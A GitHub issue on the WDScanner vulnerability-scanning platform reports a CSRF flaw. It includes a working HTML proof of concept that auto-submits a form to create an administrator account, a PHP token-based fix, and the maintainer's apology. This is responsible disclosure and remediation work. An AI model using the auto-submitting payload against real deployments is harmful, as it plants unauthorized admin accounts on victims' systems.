TideSec / WDScanner

The WDScanner platform currently implements the following functions: distributed web vulnerability scanning, customer management, scheduled vulnerability scanning, subdomain enumeration, port scanning, website crawling, hidden-link detection, broken-link detection, website fingerprinting, targeted vulnerability checks, proxy collection and deployment, and more.

There is a CSRF vulnerability that can add an administrator account #3

Closed jadacheng closed 5 years ago

jadacheng commented 5 years ago

After the administrator has logged in, open the following page. PoC: add_admin.html

```html
<!-- add_admin.html: CSRF PoC. When a logged-in WDScanner administrator opens
     this page, the browser submits the form to the admin-creation handler
     (?m=set&c=new) and attaches the victim's session cookie automatically. -->
<html>
<body>
<form id="test_form" action="http://127.0.0.1/WDScanner/?m=set&c=new" method="post">
        <!-- Fields the handler reads for the new account -->
        <input class="form-control" name="username" value="csrf">
        <input class="form-control" name="mail" value="csrf@test.com">
        <input class="form-control" name="passwd" value="123456">
        <input class="form-control" name="phone" value="19982312732">
        <input class="form-control" name="status" value="1">
        <input class="form-control" name="group" value="1">
</form>
<script type="text/javascript">
// Submit the form as soon as the page loads; no user interaction is needed.
document.getElementById("test_form").submit();
</script>
</body>
</html>
```

[screenshot attached to the original issue]
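The request succeeds because the handler behind `?m=set&c=new` trusts the session cookie alone, which the browser attaches to any cross-site form post. One way to close that on the server side, written here as an added example in PHP (WDScanner's web console is PHP) and not code from the WDScanner project: a per-session synchronizer token embedded in the real form and checked with a constant-time comparison before anything is created, with a `SameSite` session cookie and an `Origin` header check as defence in depth. The function names `csrf_token` and `csrf_check` and the `WDSCANNER_HOST` constant are assumptions, and the comment marking where the original user-insert logic runs stands in for code this page does not show.

```php
<?php
// Added example, not WDScanner's code: synchronizer-token CSRF defence for the
// admin-creation handler. Names below (csrf_token, csrf_check, WDSCANNER_HOST)
// are hypothetical.

// Hypothetical: the host the console is served from, used for the Origin check.
const WDSCANNER_HOST = '127.0.0.1';

// SameSite=Lax stops the browser attaching the session cookie to a cross-site
// top-level POST such as the auto-submitted PoC form (PHP >= 7.3 array form).
// 'secure' follows the scheme so the cookie still works on the http:// PoC host.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => !empty($_SERVER['HTTPS']),
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// Returns the per-session token, generating a random one on first use.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Verifies a state-changing request: the submitted token must equal the session
// token (hash_equals is constant-time), and if the browser sent an Origin header
// it must name this application's own host.
function csrf_check(array $post, array $server): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    // is_string guards against csrf_token[]=... turning $given into an array.
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN'])) {
        $originHost = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        if ($originHost !== WDSCANNER_HOST) {
            return false;
        }
    }
    return true;
}

// Handler for ?m=set&c=new: only POSTs carrying a valid token reach the insert.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!csrf_check($_POST, $_SERVER)) {
        http_response_code(403);
        exit('CSRF token missing or invalid');
    }
    // ... the original user-creation logic (insert into the user table) runs here ...
    exit;
}

// GET: render the legitimate form with the token as a hidden field. A page on
// another origin, like add_admin.html, cannot read this value, so its forged
// POST fails the check above.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form action="?m=set&c=new" method="post">
  <input type="hidden" name="csrf_token" value="{$token}">
  <input class="form-control" name="username">
  <input class="form-control" name="mail">
  <input class="form-control" name="passwd" type="password">
  <input class="form-control" name="phone">
  <input class="form-control" name="status" value="1">
  <input class="form-control" name="group" value="1">
  <button type="submit">Create</button>
</form>
HTML;
```

The token check is the control that actually stops the PoC; the `SameSite` cookie and `Origin` check only back it up, since older browsers may send neither, and an `Origin`-only check would still let through a same-site page that has been compromised in some other way.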

TideSec commented 5 years ago

Thank you very much! At the beginning of the system's development I only thought about implementing the functionality, and since it was always used for intranet deployment I didn't pay much attention to security issues. I am sorry.